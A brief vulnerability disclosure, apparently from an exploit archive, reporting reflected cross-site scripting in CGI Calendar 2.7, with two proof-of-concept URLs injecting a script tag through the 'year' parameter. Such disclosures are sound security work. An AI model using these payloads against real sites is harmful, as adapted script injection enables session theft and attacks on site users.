cgiCal27XSS.txt

`CGI Calendar XSS Vulnerability  
  
  
Software: CGI Calendar  
Version: 2.7  
http://cgicalendar.sourceforge.net/  
  
Description: an online calendar implemented using CGI technology  
  
Vulnerability: Cross-Site Scripting  
  
Exploit:  
/cgi-bin/calendar2/index.cgi?lang=en-us&mode=all&month=2&date=1&year=<script>alert('xss');</script>&db=1  
  
/cgi-bin/calendar2/viewday.cgi?lang=en-us&mode=all&month=2&date=1&year=<script>alert('xss');</script>&db=1  
  
Credit:  
Discovered by Revnic Vasile  
[email protected]  
`